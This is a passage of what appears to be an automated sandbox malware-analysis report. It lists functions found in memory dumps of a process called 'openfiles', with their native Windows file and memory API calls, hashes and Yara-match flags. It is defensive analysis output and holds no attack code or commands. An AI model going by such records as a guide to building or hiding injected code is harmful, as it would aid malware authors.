                                                                                                                                                  • FindClose.KERNELBASE(?), ref: 007AC93A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3541575487-0
                                                                                                                                                  • Opcode ID: 2288f4f433a9ea3f8f8dd853e15a060b9a5186db435769348c050ce9dcc08804
                                                                                                                                                  • Instruction ID: ac3dcbb753a35a63caf8a2ee6c6aada2be451e5e8a178dcf9d650f56916e4064
                                                                                                                                                  • Opcode Fuzzy Hash: 2288f4f433a9ea3f8f8dd853e15a060b9a5186db435769348c050ce9dcc08804
                                                                                                                                                  • Instruction Fuzzy Hash: 42317271900248BBDB25DB60CC99FFF777CDF85704F104558F909A7181DB78AA848BA0
                                                                                                                                                  Function 007B93A0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 007B949E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: caa8b8852afe67865b7a9e9d9b40124a3440e7c1202b16a9e74d604c32681882
                                                                                                                                                  • Instruction ID: f4a1cae2c9f7fa19d1d05f7fcbb71c8846fca4a1cf52af977d2ee00aa0a52d80
                                                                                                                                                  • Opcode Fuzzy Hash: caa8b8852afe67865b7a9e9d9b40124a3440e7c1202b16a9e74d604c32681882
                                                                                                                                                  • Instruction Fuzzy Hash: 6B31EEB5A00248AFDB14DF98D881EEFB7B9EF8C314F108219F918A7340D734A811CBA5
                                                                                                                                                  Function 007B9510 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 007B95F9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: 6fbe5d8670e2b00c43d50eabcd5977ee6880ea44795e1dbcdf300e99307aa747
                                                                                                                                                  • Instruction ID: 22c088b0e75c294977282d6ac0f8c472260df43f37c6a6256ee04be890abb342
                                                                                                                                                  • Opcode Fuzzy Hash: 6fbe5d8670e2b00c43d50eabcd5977ee6880ea44795e1dbcdf300e99307aa747
                                                                                                                                                  • Instruction Fuzzy Hash: A131E4B5A00209AFDB14DF98D881EEFB7B9EF88314F108119FD18A7341D774A911CBA5
                                                                                                                                                  Function 007B9820 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(007A1FDB,?,007B818F,00000000,00000004,00003000,?,?,?,?,?,007B818F,007A1FDB,007BB711,007B818F,08758B56), ref: 007B98EB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                  • Opcode ID: 0a2caada5bd4dfcb705f44cf68e427be7a6cb2ebb4c2bdf1eed9b20394365b38
                                                                                                                                                  • Instruction ID: c4ddce9a5f1a58f2b4e65d7b526b1529d0f589f5f77540315a9c8cbf54121641
                                                                                                                                                  • Opcode Fuzzy Hash: 0a2caada5bd4dfcb705f44cf68e427be7a6cb2ebb4c2bdf1eed9b20394365b38
                                                                                                                                                  • Instruction Fuzzy Hash: 172117B5A00249AFDB10DF98DC45FEFB7B9EF88700F108119FA18A7240D774A911CBA5
                                                                                                                                                  Function 007B9610 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DeleteFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4033686569-0
                                                                                                                                                  • Opcode ID: 3efa86d7762e1c22732c8334b1ff3184deb055d67d080abe1ab5e71ce3ba9082
                                                                                                                                                  • Instruction ID: e49885d52b4d1881c8d9fda3a6fad774fe3aaefc26b42255833368824d518ee7
                                                                                                                                                  • Opcode Fuzzy Hash: 3efa86d7762e1c22732c8334b1ff3184deb055d67d080abe1ab5e71ce3ba9082
                                                                                                                                                  • Instruction Fuzzy Hash: 6C11A371500648BAEB20EBA4CC46FEB736CEF85714F108519FA08A7181D7747915C7A5
                                                                                                                                                  Function 007B96C0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 007B96F7
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4123746961.0000000000790000.00000040.80000000.00040000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_790000_openfiles.jbxd
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                  • Opcode ID: 0ba32a543dd1fd00c3caab382bf79cfb2a445aba8da39963bcad958ac1c65b2d
                                                                                                                                                  • Instruction ID: 3530e5b47f76e80033b894bd68e8808ef124605d60d77a33e41ab967b4702d63
                                                                                                                                                  • Opcode Fuzzy Hash: 0ba32a543dd1fd00c3caab382bf79cfb2a445aba8da39963bcad958ac1c65b2d
                                                                                                                                                  • Instruction Fuzzy Hash: 8AE04636240204BBD620FA59DC42F9BB76CDBC6764F414419FA08AB242C770B91186F1
                                                                                                                                                  Function 049A4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: da78a623e2fa2b1c06be95eba531b130656956c19358f260aa0917cbc9b03147
                                                                                                                                                  • Instruction ID: d86633c03abf381dac0cdcee5bdbdf748fc633cd520e17f4bb24c3c7e6a3d88b
                                                                                                                                                  • Opcode Fuzzy Hash: da78a623e2fa2b1c06be95eba531b130656956c19358f260aa0917cbc9b03147
                                                                                                                                                  • Instruction Fuzzy Hash: FF900261601600426140B1584D08446604D9BE5305395C125A0956560C8618D95596A9
                                                                                                                                                  Function 049A4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: f06e532b7a8bf2b33b5b89452d2cd2893a4ba1b90a02574af2c4354c86bc1c0f
                                                                                                                                                  • Instruction ID: 29027a6bcf28a40922840fad3e3a5835f4892586696a794d3caac353b9c3b153
                                                                                                                                                  • Opcode Fuzzy Hash: f06e532b7a8bf2b33b5b89452d2cd2893a4ba1b90a02574af2c4354c86bc1c0f
                                                                                                                                                  • Instruction Fuzzy Hash: 6390023160590012B140B1584D88586404D9BE4305B55C021E0826554C8A14DA5657A1
                                                                                                                                                  Function 049A2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8a5fd20a1a007714168544a4e4773f40fd56988f07a118074fb45488aa2a519e
                                                                                                                                                  • Instruction ID: 0cb9bf16685556d5b3a567ea848ba112583a021b6b8dd51644eb8e3bd048fa89
                                                                                                                                                  • Opcode Fuzzy Hash: 8a5fd20a1a007714168544a4e4773f40fd56988f07a118074fb45488aa2a519e
                                                                                                                                                  • Instruction Fuzzy Hash: 9190023120150402F100B598590C686004D8BE4305F55D021A5426555EC665D9916571
                                                                                                                                                  Function 049A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: cf52fb897f2431167d101aa75b97e70c20c3dc5793f4f9ef5646a40607da3dab
                                                                                                                                                  • Instruction ID: 5e8751f1e1057efc32254bc2777ae8a0f3ef560158ab98852c38f0f8a8487f48
                                                                                                                                                  • Opcode Fuzzy Hash: cf52fb897f2431167d101aa75b97e70c20c3dc5793f4f9ef5646a40607da3dab
                                                                                                                                                  • Instruction Fuzzy Hash: A890023120158802F110B158890878A004D8BD4305F59C421A4826658D8695D9917561
                                                                                                                                                  Function 049A2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: b51abde513119a4bd0350e79da3ff8c874d00d2a7c35d83990c46fff5ce89ce0
                                                                                                                                                  • Instruction ID: 479a0252a58eb9317a45b87a026e2e4c9004820ffac5ccef53450a4a17987dee
                                                                                                                                                  • Opcode Fuzzy Hash: b51abde513119a4bd0350e79da3ff8c874d00d2a7c35d83990c46fff5ce89ce0
                                                                                                                                                  • Instruction Fuzzy Hash: EC90023120150842F100B1584908B86004D8BE4305F55C026A0526654D8615D9517961
                                                                                                                                                  Function 049A2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 061605d08525b44aeec7517a8d9f53cb6962f24220e6655e8da5c269468899a3
                                                                                                                                                  • Instruction ID: b65b4b2a0f8aa920f59a58e2c1156e071da8e7957643541b70237ee4f93e08df
                                                                                                                                                  • Opcode Fuzzy Hash: 061605d08525b44aeec7517a8d9f53cb6962f24220e6655e8da5c269468899a3
                                                                                                                                                  • Instruction Fuzzy Hash: 36900221242541527545F1584908547404E9BE4245795C022A1816950C8526E956DA61
                                                                                                                                                  Function 049A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 86eb022665994cadb3330e1da04334b563362155d87de9094303ad25ec3cbf1e
                                                                                                                                                  • Instruction ID: 9759d54e4f59ac8900c5555f54d0b217d757aa40b0c7a0212b3db58f22d59acc
                                                                                                                                                  • Opcode Fuzzy Hash: 86eb022665994cadb3330e1da04334b563362155d87de9094303ad25ec3cbf1e
                                                                                                                                                  • Instruction Fuzzy Hash: 6190023120150413F111B1584A08747004D8BD4245F95C422A0826558D9656DA52A561
                                                                                                                                                  Function 049A2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 1c9313399d016d643f5b53c9c7520c510a6eb274bdb6810961dc7f6395f9a92c
                                                                                                                                                  • Instruction ID: 4857f8ac809b13efa5008e6b06592edfec1a6571dbbad0e1d856507c377f2cf2
                                                                                                                                                  • Opcode Fuzzy Hash: 1c9313399d016d643f5b53c9c7520c510a6eb274bdb6810961dc7f6395f9a92c
                                                                                                                                                  • Instruction Fuzzy Hash: F090022921350002F180B158590C64A004D8BD5206F95D425A0417558CC915D9695761
                                                                                                                                                  Function 049A2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 1fcaa65c72c210ceeb8c13b488b9218ecab06fbada13aa1b2918cd0811ad7281
                                                                                                                                                  • Instruction ID: c345e5a5e6eb2c00d37fa012449644e9a4de1223493216eedeb954476d77dddf
                                                                                                                                                  • Opcode Fuzzy Hash: 1fcaa65c72c210ceeb8c13b488b9218ecab06fbada13aa1b2918cd0811ad7281
                                                                                                                                                  • Instruction Fuzzy Hash: 0290022130150003F140B158591C646404DDBE5305F55D021E0816554CD915D9565662
                                                                                                                                                  Function 049A2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 2050246663d0297725c5b91b3edb85d87e34e5477211a708af26be021f499fdb
                                                                                                                                                  • Instruction ID: ef317829bed814bd334293d49bc92bcba81135abaec64eeb707814cd24243ed6
                                                                                                                                                  • Opcode Fuzzy Hash: 2050246663d0297725c5b91b3edb85d87e34e5477211a708af26be021f499fdb
                                                                                                                                                  • Instruction Fuzzy Hash: 9D90022160150502F101B1584908656004E8BD4245F95C032A1426555ECA25DA92A571
                                                                                                                                                  Function 049A2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 8ee03ef67b7064ac7b7e367c95244973f1198a67d11334d780e6966d37b3497f
                                                                                                                                                  • Instruction ID: 3cfcc34d8c93c24a8162b50601db29a9a977ac36bcd7be0e608f3da875247093
                                                                                                                                                  • Opcode Fuzzy Hash: 8ee03ef67b7064ac7b7e367c95244973f1198a67d11334d780e6966d37b3497f
                                                                                                                                                  • Instruction Fuzzy Hash: F190026120190403F140B5584D08647004D8BD4306F55C021A2466555E8A29DD516575
                                                                                                                                                  Function 049A2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 4eb7429ad25b6f6d5a461417bfce9c0532982a18be75719504dc6f4d4fa3f569
                                                                                                                                                  • Instruction ID: e80f1a95d431fbc7348c24a932ee8ade54f56fb61fe8ec175d76032d201b0ceb
                                                                                                                                                  • Opcode Fuzzy Hash: 4eb7429ad25b6f6d5a461417bfce9c0532982a18be75719504dc6f4d4fa3f569
                                                                                                                                                  • Instruction Fuzzy Hash: B9900221601500426140B1688D48946404DAFE5215755C131A0D9A550D8559D9655AA5
                                                                                                                                                  Function 049A2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 3e34ab19dc40f4f1a3bab41e8d5813696d28d914f8a17ced5f12515099c9da82
                                                                                                                                                  • Instruction ID: 381c39328649ea6c4191b77e354604d232881e5e50858fd60c423b3125542dad
                                                                                                                                                  • Opcode Fuzzy Hash: 3e34ab19dc40f4f1a3bab41e8d5813696d28d914f8a17ced5f12515099c9da82
                                                                                                                                                  • Instruction Fuzzy Hash: 03900221211D0042F200B5684D18B47004D8BD4307F55C125A0556554CC915D9615961
                                                                                                                                                  Function 049A2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_4930000_openfiles.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: 91a301f3b212255bfe5573565247441cb3218fa87eddefa857191a887657e0c6
                                                                                                                                                  • Instruction ID: 7d6baa1165175b2b256416f124d1f5241059334df36fec24be0e823f9b122295
                                                                                                                                                  • Opcode Fuzzy Hash: 91a301f3b212255bfe5573565247441cb3218fa87eddefa857191a887657e0c6
                                                                                                                                                  • Instruction Fuzzy Hash: 8E90026134150442F100B1584918B46004DCBE5305F55C025E1466554D8619DD526566
                                                                                                                                                  Function 049A2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.4124808609.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004A5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.4124808609.0000000004ACE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
